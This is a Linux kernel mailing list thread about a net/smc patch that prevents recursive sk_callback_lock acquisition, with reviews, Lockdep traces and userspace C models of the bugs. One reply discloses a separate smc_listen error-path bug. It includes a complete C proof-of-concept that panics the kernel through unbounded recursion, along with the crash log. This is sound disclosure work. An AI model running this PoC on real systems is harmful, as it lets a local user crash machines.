* [PATCH net] net/smc: avoid recursive sk_callback_lock in listen data_ready
From: Runyu Xiao @ 2026-06-17 15:28 UTC
To: D. Wythe, Dust Li, Sidraya Jayagond, Wenjia Zhang,
David S. Miller, Eric Dumazet, Jakub Kicinski, Paolo Abeni
Cc: Mahanta Jambigi, Tony Lu, Wen Gu, Simon Horman, Karsten Graul,
linux-rdma, linux-s390, netdev, linux-kernel, jianhao.xu,
runyu.xiao, stable
smc_listen() installs smc_clcsock_data_ready() as the underlying TCP
listen socket's sk_data_ready callback. smc_clcsock_data_ready() then
immediately takes sk_callback_lock before looking up the SMC listener and
queuing smc_tcp_listen_work().
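The callback installation described above follows a save/replace/restore pattern. Below is a minimal userspace sketch of that pattern, under stated assumptions. It is not the kernel code: struct model_sock, model_replace_cb(), model_restore_cb() and the two callbacks are hypothetical names. The "save only once" guard is an assumption about how a helper like smc_clcsock_replace_cb() behaves.

```c
#include <assert.h>
#include <stddef.h>

struct model_sock; /* hypothetical stand-in for struct sock */
typedef void (*ready_cb)(struct model_sock *);

struct model_sock {
	ready_cb data_ready; /* plays the role of sk->sk_data_ready */
	int hits_tcp;        /* calls that reached the original TCP callback */
	int hits_smc;        /* calls that reached the SMC wrapper */
};

/* Hypothetical original TCP callback and SMC wrapper: they only count calls. */
static void model_tcp_ready(struct model_sock *sk) { sk->hits_tcp++; }
static void model_smc_ready(struct model_sock *sk) { sk->hits_smc++; }

/* Install new_cb. The previous callback is saved only if nothing is saved
 * yet, so a second install cannot overwrite the original with the wrapper. */
static void model_replace_cb(ready_cb *target, ready_cb new_cb, ready_cb *saved)
{
	if (!*saved)
		*saved = *target;
	*target = new_cb;
}

/* Put the saved callback back (if there is one) and forget it. */
static void model_restore_cb(ready_cb *target, ready_cb *saved)
{
	if (!*saved)
		return;
	*target = *saved;
	*saved = NULL;
}
```

The guard is the important design point. Installing the wrapper twice leaves the saved slot pointing at the real original, so a later restore cannot reinstall the wrapper.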
That is unsafe once the TCP listen socket is leaving TCP_LISTEN. The TCP
close/flush path can run the installed sk_data_ready callback with
sk_callback_lock already held, so entering smc_clcsock_data_ready() again
tries to take the same rwlock recursively in the same thread. The nvmet
TCP listener had to make the same state check before taking
sk_callback_lock for this reason.
This issue was found by our static analysis tool and then manually
reviewed against the current tree.
The grounded PoC kept the SMC listen callback installation path:

  smc_listen()
    smc_clcsock_replace_cb()
      sk_data_ready = smc_clcsock_data_ready()

It then modeled the close/flush carrier that invokes the installed
sk_data_ready callback while sk_callback_lock is already held. Lockdep
reported the same-thread recursive acquisition:

  WARNING: possible recursive locking detected
  smc_clcsock_data_ready+0xa/0x4d [vuln_msv]
  smc_close_flush_work+0x1f/0x30 [vuln_msv]
  *** DEADLOCK ***

Return before taking sk_callback_lock when the underlying TCP socket is no
longer in TCP_LISTEN. In that state there is no listen accept work to
queue for SMC, and avoiding the callback lock mirrors the fix used by the
TCP nvmet listener.
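The recursion and the proposed early return can be sketched as a single-threaded userspace model. All names below are hypothetical, including struct model_sock, model_data_ready() and model_close_flush(). The rwlock is reduced to a writer flag plus a reader count. When a read acquisition would have to wait for a writer, the model counts it as a would-be deadlock instead of spinning. The model also assumes that the close path has already moved the socket out of TCP_LISTEN before it takes the write side and invokes the callback.

```c
#include <assert.h>
#include <stdbool.h>

/* Hypothetical single-threaded stand-in for an rwlock like sk_callback_lock. */
struct model_rwlock {
	int readers;
	bool writer;
};

enum model_tcp_state { MODEL_TCP_LISTEN, MODEL_TCP_CLOSE };

/* Hypothetical stand-in for the listen clcsock; not a kernel structure. */
struct model_sock {
	struct model_rwlock callback_lock; /* role of sk_callback_lock */
	enum model_tcp_state state;        /* role of sk_state */
	bool patched;                      /* apply the proposed early return? */
	int deadlocks;                     /* reads that would wait on our own writer */
	int work_queued;                   /* role of queuing smc_tcp_listen_work() */
};

/* Returns false where a real read_lock_bh() would spin on a held writer. */
static bool model_read_trylock(struct model_rwlock *l)
{
	if (l->writer)
		return false;
	l->readers++;
	return true;
}

static void model_read_unlock(struct model_rwlock *l)
{
	l->readers--;
}

/* Model of smc_clcsock_data_ready(), optionally with the TCP_LISTEN check. */
static void model_data_ready(struct model_sock *sk)
{
	if (sk->patched && sk->state != MODEL_TCP_LISTEN)
		return; /* proposed fix: leave before touching the lock */
	if (!model_read_trylock(&sk->callback_lock)) {
		sk->deadlocks++; /* same thread already holds the write side */
		return;
	}
	sk->work_queued++;
	model_read_unlock(&sk->callback_lock);
}

/* Assumed close/flush ordering: leave LISTEN, take the write side, then
 * invoke the installed data_ready callback while still holding it. */
static void model_close_flush(struct model_sock *sk)
{
	sk->state = MODEL_TCP_CLOSE;
	sk->callback_lock.writer = true;
	model_data_ready(sk);
	sk->callback_lock.writer = false;
}
```

Under that assumed ordering, the early return keeps the re-entered callback away from the lock. A listening socket with no writer still queues its work as before.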
Fixes: 0558226cebee ("net/smc: Fix slab-out-of-bounds issue in fallback")
Cc: stable@vger.kernel.org
Signed-off-by: Runyu Xiao <runyu.xiao@seu.edu.cn>
---
net/smc/af_smc.c | 3 +++
1 file changed, 3 insertions(+)
diff --git a/net/smc/af_smc.c b/net/smc/af_smc.c
index 6421c2e1c84d..1af4e3c333ff 100644
--- a/net/smc/af_smc.c
+++ b/net/smc/af_smc.c
@@ -2631,6 +2631,9 @@ static void smc_clcsock_data_ready(struct sock *listen_clcsock)
 {
 	struct smc_sock *lsmc;
 
+	if (READ_ONCE(listen_clcsock->sk_state) != TCP_LISTEN)
+		return;
+
 	read_lock_bh(&listen_clcsock->sk_callback_lock);
 	lsmc = smc_clcsock_user_data(listen_clcsock);
 	if (!lsmc)
--
2.34.1

* Re: [PATCH net] net/smc: avoid recursive sk_callback_lock in listen data_ready
From: Mahanta Jambigi @ 2026-06-18 6:24 UTC
To: Runyu Xiao, D. Wythe, Dust Li, Sidraya Jayagond, Wenjia Zhang,
David S. Miller, Eric Dumazet, Jakub Kicinski, Paolo Abeni
Cc: Tony Lu, Wen Gu, Simon Horman, Karsten Graul, linux-rdma, linux-s390,
netdev, linux-kernel, jianhao.xu, stable

On 17/06/26 8:58 pm, Runyu Xiao wrote:
> smc_listen() installs smc_clcsock_data_ready() as the underlying TCP
> listen socket's sk_data_ready callback. smc_clcsock_data_ready() then
> immediately takes sk_callback_lock before looking up the SMC listener and
> queuing smc_tcp_listen_work().
>
> That is unsafe once the TCP listen socket is leaving TCP_LISTEN. The TCP
> close/flush path can run the installed sk_data_ready callback with
> sk_callback_lock already held, so entering smc_clcsock_data_ready() again
> tries to take the same rwlock recursively in the same thread. The nvmet

Could you provide the exact call stack showing the recursive lock? Please
also share the nvmet commit details.

> TCP listener had to make the same state check before taking
> sk_callback_lock for this reason.
>
> [...]
>
> diff --git a/net/smc/af_smc.c b/net/smc/af_smc.c
> index 6421c2e1c84d..1af4e3c333ff 100644
> --- a/net/smc/af_smc.c
> +++ b/net/smc/af_smc.c
> @@ -2631,6 +2631,9 @@ static void smc_clcsock_data_ready(struct sock *listen_clcsock)
>  {
>  	struct smc_sock *lsmc;
>  
> +	if (READ_ONCE(listen_clcsock->sk_state) != TCP_LISTEN)

Is the *TCP_LISTEN* check sufficient? What about *TCP_SYN_RECV* or
*TCP_ESTABLISHED*?

> +		return;
> +
>  	read_lock_bh(&listen_clcsock->sk_callback_lock);
>  	lsmc = smc_clcsock_user_data(listen_clcsock);
>  	if (!lsmc)

* Re: [PATCH net] net/smc: avoid recursive sk_callback_lock in listen data_ready
From: Runyu Xiao @ 2026-06-18 14:16 UTC
To: Mahanta Jambigi, D. Wythe, Dust Li, Sidraya Jayagond, Wenjia Zhang,
David S. Miller, Eric Dumazet, Jakub Kicinski, Paolo Abeni
Cc: Tony Lu, Wen Gu, Simon Horman, Karsten Graul, linux-rdma, linux-s390,
netdev, linux-kernel, jianhao.xu, runyu.xiao

Hi,

Thanks for taking a look.

The exact Lockdep stack I have is from the grounded reproducer, not from
a production SMC setup. The reproducer keeps the same callback shape:
the close/flush side holds sk_callback_lock and invokes the installed
sk_data_ready callback, which re-enters smc_clcsock_data_ready() and tries
to take sk_callback_lock again.

The relevant Lockdep report is:

  WARNING: possible recursive locking detected
  kworker/u4:3/39 is trying to acquire lock:
  (sk_callback_lock) at smc_clcsock_data_ready+0xa/0x4d

  but task is already holding lock:
  (sk_callback_lock) at smc_close_flush_work+0xc/0x30

  Possible unsafe locking scenario:

        CPU0
        ----
   lock(sk_callback_lock);
   lock(sk_callback_lock);

   *** DEADLOCK ***

  Workqueue: smc_close_wq smc_close_flush_work

  Call Trace:
   dump_stack_lvl
   __lock_acquire
   lock_acquire
   _raw_read_lock_bh
   smc_clcsock_data_ready+0xa/0x4d
   smc_close_flush_work+0x1f/0x30
   process_one_work
   worker_thread
   kthread
   ret_from_fork

The nvmet change I referred to is:

  2fa8961d3a6a ("nvmet-tcp: fixup hang in nvmet_tcp_listen_data_ready()")

The stable/backport patch I originally used as the reference is:

  1c90f930e7b4 ("nvmet-tcp: fixup hang in nvmet_tcp_listen_data_ready()")

Its commit message says that when the socket is closed while in
TCP_LISTEN, the flush callback can call nvmet_tcp_listen_data_ready()
with sk_callback_lock already held, so nvmet moved the TCP_LISTEN check
before taking sk_callback_lock.

For the TCP_LISTEN check: my reasoning was that smc_clcsock_data_ready()
is installed by smc_listen() on the underlying TCP listen socket and only
queues smc_tcp_listen_work() for the SMC listen/accept path. Once that
underlying socket is no longer in TCP_LISTEN, there should be no SMC
listen accept work to queue from this callback. TCP_SYN_RECV and
TCP_ESTABLISHED are not listen-socket states for this callback path, so I
did not intend the callback to queue listen work for those states.

That said, if SMC expects smc_clcsock_data_ready() to handle a non-LISTEN
state during fallback or another transition, then the proposed check is
too strict and I should rework the fix.

Thanks,
Runyu

* Re: [PATCH net] net/smc: avoid recursive sk_callback_lock in listen data_ready
From: Mahanta Jambigi @ 2026-06-19 5:36 UTC
To: Runyu Xiao, D. Wythe, Dust Li, Sidraya Jayagond, Wenjia Zhang,
David S. Miller, Eric Dumazet, Jakub Kicinski, Paolo Abeni
Cc: Tony Lu, Wen Gu, Simon Horman, Karsten Graul, linux-rdma, linux-s390,
netdev, linux-kernel, jianhao.xu

On 18/06/26 7:46 pm, Runyu Xiao wrote:
> Hi,
>
> Thanks for taking a look.
>
> The exact Lockdep stack I have is from the grounded reproducer, not from
> a production SMC setup. The reproducer keeps the same callback shape:
> the close/flush side holds sk_callback_lock and invokes the installed
> sk_data_ready callback, which re-enters smc_clcsock_data_ready() and tries
> to take sk_callback_lock again.
>
> The relevant Lockdep report is:
>
>   WARNING: possible recursive locking detected
>   kworker/u4:3/39 is trying to acquire lock:
>   (sk_callback_lock) at smc_clcsock_data_ready+0xa/0x4d
>
>   but task is already holding lock:
>   (sk_callback_lock) at smc_close_flush_work+0xc/0x30
>
>   Possible unsafe locking scenario:
>
>         CPU0
>         ----
>    lock(sk_callback_lock);
>    lock(sk_callback_lock);
>
>    *** DEADLOCK ***
>
>   Workqueue: smc_close_wq smc_close_flush_work
>
>   Call Trace:
>    dump_stack_lvl
>    __lock_acquire
>    lock_acquire
>    _raw_read_lock_bh
>    smc_clcsock_data_ready+0xa/0x4d
>    smc_close_flush_work+0x1f/0x30
>    process_one_work
>    worker_thread
>    kthread
>    ret_from_fork

Thank you for addressing the feedback. My suggestion would be to reply to
the original email thread where the review comments were given, so that
the maintainers can follow the conversation:

https://www.kernel.org/doc/html/latest/process/submitting-patches.html#respond-to-review-comments

Please include the above call stack in your next version.

>
> The nvmet change I referred to is:
>
>   2fa8961d3a6a ("nvmet-tcp: fixup hang in nvmet_tcp_listen_data_ready()")

Please include this info in your next version.

> [...]
>
> For the TCP_LISTEN check: my reasoning was that smc_clcsock_data_ready()
> is installed by smc_listen() on the underlying TCP listen socket and only
> queues smc_tcp_listen_work() for the SMC listen/accept path. Once that
> underlying socket is no longer in TCP_LISTEN, there should be no SMC
> listen accept work to queue from this callback. TCP_SYN_RECV and
> TCP_ESTABLISHED are not listen-socket states for this callback path, so I
> did not intend the callback to queue listen work for those states.

I understand. Please include this info in your next version.

> [...]

* [PATCH net v2] net/smc: avoid recursive sk_callback_lock in listen data_ready
From: Runyu Xiao @ 2026-06-19 5:48 UTC
To: D. Wythe, Dust Li, Sidraya Jayagond, Wenjia Zhang,
David S. Miller, Eric Dumazet, Jakub Kicinski, Paolo Abeni
Cc: Mahanta Jambigi, Tony Lu, Wen Gu, Simon Horman, Karsten Graul,
linux-rdma, linux-s390, netdev, linux-kernel, jianhao.xu,
runyu.xiao, stable

smc_listen() installs smc_clcsock_data_ready() as the underlying TCP
listen socket's sk_data_ready callback. The callback takes
sk_callback_lock before looking up the SMC listener and queuing
smc_tcp_listen_work().

This can recurse when the underlying TCP listen socket is being closed.
The close/flush path may invoke the installed sk_data_ready callback with
sk_callback_lock already held, so smc_clcsock_data_ready() tries to take
the same rwlock again in the same thread.

This issue was found by our static analysis tool and then manually
reviewed against the current tree.

The reproducer keeps the SMC listen callback installation path:

  smc_listen()
    smc_clcsock_replace_cb()
      sk_data_ready = smc_clcsock_data_ready()

It then models the close/flush carrier that invokes the installed
sk_data_ready callback while sk_callback_lock is already held. Lockdep
reports the same-thread recursive acquisition:

  WARNING: possible recursive locking detected
  kworker/u4:3/39 is trying to acquire lock:
  (sk_callback_lock) at smc_clcsock_data_ready+0xa/0x4d

  but task is already holding lock:
  (sk_callback_lock) at smc_close_flush_work+0xc/0x30

  Possible unsafe locking scenario:

        CPU0
        ----
   lock(sk_callback_lock);
   lock(sk_callback_lock);

   *** DEADLOCK ***

  Workqueue: smc_close_wq smc_close_flush_work

  Call Trace:
   dump_stack_lvl
   __lock_acquire
   lock_acquire
   _raw_read_lock_bh
   smc_clcsock_data_ready
   smc_close_flush_work
   process_one_work
   worker_thread
   kthread
   ret_from_fork

The same pattern was fixed for nvmet TCP by checking TCP_LISTEN before
taking sk_callback_lock:

  commit 2fa8961d3a6a ("nvmet-tcp: fixup hang in nvmet_tcp_listen_data_ready()")

Do the same for SMC. smc_clcsock_data_ready() is installed by
smc_listen() on the underlying TCP listen socket and only queues
smc_tcp_listen_work() for the SMC listen/accept path. Once that socket is
no longer in TCP_LISTEN, there is no listen accept work to queue from
this callback, and avoiding sk_callback_lock also avoids the recursive
locking path.

Fixes: 0558226cebee ("net/smc: Fix slab-out-of-bounds issue in fallback")
Cc: stable@vger.kernel.org
Signed-off-by: Runyu Xiao <runyu.xiao@seu.edu.cn>
---
v2:
- Include the fuller Lockdep stack from the grounded reproducer.
- Add the related nvmet TCP fix reference.
- Explain why the TCP_LISTEN check is valid for the SMC listen callback.

 net/smc/af_smc.c | 3 +++
 1 file changed, 3 insertions(+)

diff --git a/net/smc/af_smc.c b/net/smc/af_smc.c
index 6421c2e1c84d..1af4e3c333ff 100644
--- a/net/smc/af_smc.c
+++ b/net/smc/af_smc.c
@@ -2631,6 +2631,9 @@ static void smc_clcsock_data_ready(struct sock *listen_clcsock)
 {
 	struct smc_sock *lsmc;
 
+	if (READ_ONCE(listen_clcsock->sk_state) != TCP_LISTEN)
+		return;
+
 	read_lock_bh(&listen_clcsock->sk_callback_lock);
 	lsmc = smc_clcsock_user_data(listen_clcsock);
 	if (!lsmc)
--
2.34.1

* Re: [PATCH net v2] net/smc: avoid recursive sk_callback_lock in listen data_ready
From: XIAO WU @ 2026-06-23 10:38 UTC
To: Runyu Xiao, D. Wythe, Dust Li, Sidraya Jayagond, Wenjia Zhang,
David S. Miller, Eric Dumazet, Jakub Kicinski, Paolo Abeni
Cc: Mahanta Jambigi, Tony Lu, Wen Gu, Simon Horman, Karsten Graul,
linux-rdma, linux-s390, netdev, linux-kernel, jianhao.xu, stable

Hi Runyu,

Thanks for this patch.

> diff --git a/net/smc/af_smc.c b/net/smc/af_smc.c
> index 6421c2e1c84d..1af4e3c333ff 100644
> --- a/net/smc/af_smc.c
> +++ b/net/smc/af_smc.c
> @@ -2631,6 +2631,9 @@ static void smc_clcsock_data_ready(struct sock *listen_clcsock)
>  {
>  	struct smc_sock *lsmc;
>  
> +	if (READ_ONCE(listen_clcsock->sk_state) != TCP_LISTEN)
> +		return;
> +
>  	read_lock_bh(&listen_clcsock->sk_callback_lock);
>  	lsmc = smc_clcsock_user_data(listen_clcsock);

The TCP_LISTEN check before taking sk_callback_lock looks correct and
mirrors the same pattern from nvmet TCP.

Sashiko AI review also looked at this patch and flagged a separate,
pre-existing issue nearby: the error path in smc_listen() does not
restore icsk_af_ops when kernel_listen() fails.

https://sashiko.dev/#/patchset/20260617152855.1039151-1-runyu.xiao@seu.edu.cn

The relevant code in smc_listen() (net/smc/af_smc.c, lines ~2687-2704):

	smc->ori_af_ops = inet_csk(smc->clcsock->sk)->icsk_af_ops;
	smc->af_ops = *smc->ori_af_ops;
	smc->af_ops.syn_recv_sock = smc_tcp_syn_recv_sock;
	inet_csk(smc->clcsock->sk)->icsk_af_ops = &smc->af_ops;
	if (smc->limit_smc_hs)
		tcp_sk(smc->clcsock->sk)->smc_hs_congested = smc_hs_congested;
	rc = kernel_listen(smc->clcsock, backlog);
	if (rc) {
		write_lock_bh(&smc->clcsock->sk->sk_callback_lock);
		smc_clcsock_restore_cb(&smc->clcsock->sk->sk_data_ready,
				       &smc->clcsk_data_ready);
		rcu_assign_sk_user_data(smc->clcsock->sk, NULL);
		write_unlock_bh(&smc->clcsock->sk->sk_callback_lock);
		goto out;
	}

The error path restores sk_data_ready and sk_user_data but leaves
icsk_af_ops pointing to &smc->af_ops, whose syn_recv_sock is already set
to smc_tcp_syn_recv_sock.

I verified this in a QEMU VM and can confirm it triggers a real kernel
stack overflow.

=== Reproduction ===

Kernel: 7.1.0-rc7-gfa471042f07a #1 SMP PREEMPT_DYNAMIC x86_64
Config: ci-qemu-upstream.config (KASAN=y, CONFIG_SMC=y, DEBUG_LIST=y)
QEMU:   qemu-system-x86_64 -m 2G -smp 2

Trigger sequence:

1. SMC socket A: setsockopt(SO_REUSEADDR), bind to port P
   → clcsock gets SO_REUSEADDR via smc_bind() copy
2. TCP socket C: setsockopt(SO_REUSEADDR), bind + listen on port P
   → Both non-TCP_LISTEN at bind time → bind OK
   → C enters TCP_LISTEN after its listen()
3. listen(A) on SMC → kernel_listen() fails with EADDRINUSE
   → icsk_af_ops NOT restored → clcsock points to wrapper
4. Close TCP C (free port), listen(A) again → succeeds
   → ori_af_ops now points to wrapper with syn_recv_sock = smc_tcp_syn_recv_sock
5. TCP connect() to port P → smc_tcp_syn_recv_sock calls itself
   → infinite recursion → IRQ stack guard page hit → kernel panic

=== Full PoC ===

Compile with: gcc -o poc poc.c -static

// PoC: Stack overflow via corrupted icsk_af_ops in smc_listen error path
#define _GNU_SOURCE
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <errno.h>
#include <signal.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <sys/wait.h>
#include <netinet/in.h>
#include <arpa/inet.h>

#ifndef PF_SMC
#define PF_SMC 43
#endif
#ifndef SMCPROTO_SMC
#define SMCPROTO_SMC 0
#endif

int main(void)
{
	int smc_a, tcp_c, client;
	struct sockaddr_in addr;
	pid_t child;
	int status, ret;
	socklen_t len;
	int val;

	printf("=== SMC listen error path -> stack overflow PoC ===\n\n");

	/* Step 1: SMC socket A with SO_REUSEADDR, bind to any free port */
	printf("[1] Create SMC socket A with SO_REUSEADDR\n");
	smc_a = socket(PF_SMC, SOCK_STREAM, 0);
	if (smc_a < 0) {
		perror("smc socket");
		return 1;
	}
	val = 1;
	setsockopt(smc_a, SOL_SOCKET, SO_REUSEADDR, &val, sizeof(val));

	memset(&addr, 0, sizeof(addr));
	addr.sin_family = AF_INET;
	addr.sin_addr.s_addr = htonl(INADDR_ANY);
	addr.sin_port = 0;
	if (bind(smc_a, (struct sockaddr *)&addr, sizeof(addr)) < 0) {
		perror("bind smc_a");
		close(smc_a);
		return 1;
	}

	len = sizeof(addr);
	if (getsockname(smc_a, (struct sockaddr *)&addr, &len) < 0) {
		perror("getsockname");
		close(smc_a);
		return 1;
	}
	int port = ntohs(addr.sin_port);
	printf(" SMC A bound to port %d\n", port);

	/* Step 2: TCP socket C with SO_REUSEADDR, bind+listen on same port */
	printf("[2] TCP C with SO_REUSEADDR, bind+listen on port %d\n", port);
	tcp_c = socket(AF_INET, SOCK_STREAM, 0);
	val = 1;
	setsockopt(tcp_c, SOL_SOCKET, SO_REUSEADDR, &val, sizeof(val));

	memset(&addr, 0, sizeof(addr));
	addr.sin_family = AF_INET;
	addr.sin_addr.s_addr = htonl(INADDR_ANY);
	addr.sin_port = htons(port);
	if (bind(tcp_c, (struct sockaddr *)&addr, sizeof(addr)) < 0) {
		perror("bind tcp_c");
		close(tcp_c);
		close(smc_a);
		return 1;
	}
	if (listen(tcp_c, 5) < 0) {
		perror("listen tcp_c");
		close(tcp_c);
		close(smc_a);
		return 1;
	}
	printf(" TCP C listening on port %d\n", port);

	/* Step 3: listen(A) should FAIL → icsk_af_ops NOT restored */
	printf("[3] listen(SMC A) — expect failure... ");
	fflush(stdout);
	ret = listen(smc_a, 5);
	if (ret == 0) {
		printf("succeeded! Unexpected.\n");
		close(tcp_c);
		close(smc_a);
		return 1;
	}
	printf("failed: %s\n", strerror(errno));

	/* Step 4: Close TCP C to free the port */
	printf("[4] Close TCP C to free port %d\n", port);
	close(tcp_c);
	sleep(1);

	/* Step 5: listen(A) again → succeeds but ori_af_ops is self-referential */
	printf("[5] listen(SMC A) again... ");
	fflush(stdout);
	ret = listen(smc_a, 5);
	if (ret < 0) {
		printf("failed: %s, retrying...\n", strerror(errno));
		sleep(2);
		ret = listen(smc_a, 5);
	}
	if (ret < 0) {
		perror("retry");
		close(smc_a);
		return 1;
	}
	printf("succeeded! ori_af_ops->syn_recv_sock == smc_tcp_syn_recv_sock\n");

	/* Step 6: TCP connect → smc_tcp_syn_recv_sock recursion → STACK OVERFLOW */
	printf("[6] TCP connect → triggers infinite recursion...\n");
	fflush(stdout);

	child = fork();
	if (child == 0) {
		client = socket(AF_INET, SOCK_STREAM, 0);
		if (client < 0)
			exit(1);
		memset(&addr, 0, sizeof(addr));
		addr.sin_family = AF_INET;
		addr.sin_addr.s_addr = htonl(INADDR_LOOPBACK);
		addr.sin_port = htons(port);
		if (connect(client, (struct sockaddr *)&addr, sizeof(addr)) < 0) {
			perror("connect");
			exit(1);
		}
		sleep(3);
		close(client);
		exit(0);
	}

	printf("Waiting for crash...\n");
	sleep(5);

	if (waitpid(child, &status, WNOHANG) == 0) {
		printf("Child still alive — check dmesg\n");
		kill(child, SIGKILL);
		waitpid(child, NULL, 0);
	}

	close(smc_a);
	return 0;
}

=== Crash Log ===

Linux syzkaller 7.1.0-rc7-gfa471042f07a #1 SMP PREEMPT_DYNAMIC x86_64
(CONFIG_KASAN=y, CONFIG_SMC=y, CONFIG_DEBUG_LIST=y)

[ 1453.562682][ C0] BUG: IRQ stack guard page was hit at ffffc8ffffffff98 (stack is ffffc90000000000..ffffc90000008000)
[ 1453.562712][ C0] Oops: stack guard page: 0000 [#1] SMP KASAN NOPTI
[ 1453.562733][ C0] CPU: 0 UID: 0 PID: 10840 Comm: poc Not tainted 7.1.0-rc7-gfa471042f07a #1 PREEMPT(full)
[ 1453.562756][ C0] Hardware name: QEMU Standard PC (Q35 + ICH9, 2009), BIOS 1.16.3-debian-1.16.3-2 04/01/2014
[ 1453.562767][ C0] RIP: 0010:__lock_acquire+0x417/0x2730
[ 1453.562965][ C0] Call Trace:
[ 1453.562970][ C0]  <IRQ>
[ 1453.562980][ C0]  lock_acquire+0x1ae/0x360
[ 1453.562995][ C0]  ? smc_tcp_syn_recv_sock+0xab/0xb10
[ 1453.563031][ C0]  smc_tcp_syn_recv_sock+0xbf/0xb10
[ 1453.563051][ C0]  ? smc_tcp_syn_recv_sock+0xab/0xb10
[ 1453.563073][ C0]  ? __pfx_smc_tcp_syn_recv_sock+0x10/0x10
[ 1453.563114][ C0]  smc_tcp_syn_recv_sock+0x435/0xb10
[ 1453.563158][ C0]  smc_tcp_syn_recv_sock+0x435/0xb10
[ 1453.563200][ C0]  smc_tcp_syn_recv_sock+0x435/0xb10
[ 1453.563244][ C0]  smc_tcp_syn_recv_sock+0x435/0xb10
[... 15+ recursive frames ...]
[ 1453.564373][ C0]  smc_tcp_syn_recv_sock+0x435/0xb10
[ 1453.564413][ C0]  smc_tcp_syn_recv_sock+0x435/0xb10
[ 1453.577027][ C0] RIP: 0033:0x423574
[ 1453.577319][ C0] Kernel panic - not syncing: Fatal exception in interrupt

The infinite recursion is visible in the repeated
smc_tcp_syn_recv_sock+0x435/0xb10 frames. Each iteration calls
ori_af_ops->syn_recv_sock(), which is the function itself, and pushes a
new frame until the IRQ stack guard page is hit.

Thanks,
Xiao
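The self-referential icsk_af_ops described above can be reproduced without a kernel in a small userspace model. The following names are hypothetical stand-ins:

- struct model_ops for icsk_af_ops
- struct model_listener for the clcsock plus smc->ori_af_ops and smc->af_ops
- model_listen() for the smc_listen() prologue
- MODEL_MAX_DEPTH for the finite stack

The depth limit exists only so the sketch terminates. The restore_on_error flag models one possible fix: resetting the active ops to the saved original on the kernel_listen() failure path. That fix is an assumption for illustration, not a posted patch.

```c
#include <assert.h>
#include <stddef.h>

/* Hypothetical stand-in for the ops table behind icsk_af_ops. */
struct model_ops {
	int (*syn_recv_sock)(void *owner, int depth);
};

/* Hypothetical stand-in for the listening clcsock plus smc_sock fields. */
struct model_listener {
	const struct model_ops *active; /* role of icsk_af_ops */
	const struct model_ops *ori;    /* role of smc->ori_af_ops */
	struct model_ops wrapper;       /* role of smc->af_ops */
};

#define MODEL_MAX_DEPTH 64 /* stand-in for the finite IRQ stack */

/* Base TCP handler: reports how deep the call chain got. */
static int model_tcp_syn_recv_sock(void *owner, int depth)
{
	(void)owner;
	return depth;
}

static const struct model_ops model_tcp_ops = { model_tcp_syn_recv_sock };

/* Wrapper: forwards to whatever was saved as the "original" ops. The real
 * wrapper has no depth limit; per the crash log above it recurses until the
 * stack guard page is hit. Here -1 marks that outcome. */
static int model_smc_syn_recv_sock(void *owner, int depth)
{
	struct model_listener *l = owner;

	if (depth >= MODEL_MAX_DEPTH)
		return -1;
	return l->ori->syn_recv_sock(owner, depth + 1);
}

/* Model of the quoted smc_listen() prologue followed by a listen that may
 * fail. restore_on_error selects the hypothetical fix. */
static int model_listen(struct model_listener *l, int listen_fails,
			int restore_on_error)
{
	l->ori = l->active;    /* unconditional save, as in the quoted code */
	l->wrapper = *l->ori;  /* exact self-overlap is fine if ori == &wrapper */
	l->wrapper.syn_recv_sock = model_smc_syn_recv_sock;
	l->active = &l->wrapper;
	if (listen_fails) {
		if (restore_on_error)
			l->active = l->ori;
		return -1;
	}
	return 0;
}
```

On the buggy path, the second listen saves the wrapper itself as the "original". The wrapper then forwards to itself until the limit is reached. With the restore, the second listen saves the real TCP ops again, and one forward reaches the base handler.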

* Re: [PATCH net v2] net/smc: avoid recursive sk_callback_lock in listen data_ready
From: Runyu Xiao @ 2026-06-24 10:37 UTC
To: XIAO WU
Cc: D. Wythe, Dust Li, Sidraya Jayagond, Wenjia Zhang, David S. Miller,
Eric Dumazet, Jakub Kicinski, Paolo Abeni, Mahanta Jambigi, Tony Lu,
Wen Gu, Simon Horman, Karsten Graul, linux-rdma, linux-s390, netdev,
linux-kernel, jianhao.xu

Hi Xiao,

> the error path in smc_listen() does not restore icsk_af_ops when
> kernel_listen() fails

Thanks, this looks like a real error-path bug. I will prepare it as a
separate fix for smc_listen() rather than folding it into this
sk_callback_lock patch.

Runyu

* Re: [PATCH net] net/smc: avoid recursive sk_callback_lock in listen data_ready
From: Dust Li @ 2026-06-19 6:35 UTC
To: Runyu Xiao, D. Wythe, Sidraya Jayagond, Wenjia Zhang,
David S. Miller, Eric Dumazet, Jakub Kicinski, Paolo Abeni
Cc: Mahanta Jambigi, Tony Lu, Wen Gu, Simon Horman, Karsten Graul,
linux-rdma, linux-s390, netdev, linux-kernel, jianhao.xu, stable

On 2026-06-17 23:28:55, Runyu Xiao wrote:
>[...]
>
>It then modeled the close/flush carrier that invokes the installed
>sk_data_ready callback while sk_callback_lock is already held. Lockdep
>reported the same-thread recursive acquisition:
>
>  WARNING: possible recursive locking detected
>  smc_clcsock_data_ready+0xa/0x4d [vuln_msv]
>  smc_close_flush_work+0x1f/0x30 [vuln_msv]
>  *** DEADLOCK ***
>
>Return before taking sk_callback_lock when the underlying TCP socket is no
>longer in TCP_LISTEN. In that state there is no listen accept work to
>queue for SMC, and avoiding the callback lock mirrors the fix used by the
>TCP nvmet listener.

Hi Runyu,

I noticed the lockdep splat comes from your own kernel module ([vuln_msv])
that models the condition, rather than from a real TCP code path.

Could you point me to the specific mainline TCP code path that calls
sk_data_ready() while holding sk_callback_lock?

If such a path exists, I'm happy to take this patch. But if this is based
solely on static analysis without a confirmed real call chain, I'd prefer
to focus our review bandwidth on issues that have demonstrated impact.

Thanks,
Dust

* Re: [PATCH net] net/smc: avoid recursive sk_callback_lock in listen data_ready
From: Sidraya Jayagond @ 2026-06-25 8:32 UTC
To: Runyu Xiao, D. Wythe, Dust Li, Wenjia Zhang, David S. Miller,
Eric Dumazet, Jakub Kicinski, Paolo Abeni
Cc: Mahanta Jambigi, Tony Lu, Wen Gu, Simon Horman, Karsten Graul,
linux-rdma, linux-s390, netdev, linux-kernel, jianhao.xu, stable

On 17/06/26 8:58 pm, Runyu Xiao wrote:
> [...]
>
> diff --git a/net/smc/af_smc.c b/net/smc/af_smc.c
> index 6421c2e1c84d..1af4e3c333ff 100644
> --- a/net/smc/af_smc.c
> +++ b/net/smc/af_smc.c
> @@ -2631,6 +2631,9 @@ static void smc_clcsock_data_ready(struct sock *listen_clcsock)
>  {
>  	struct smc_sock *lsmc;
>  
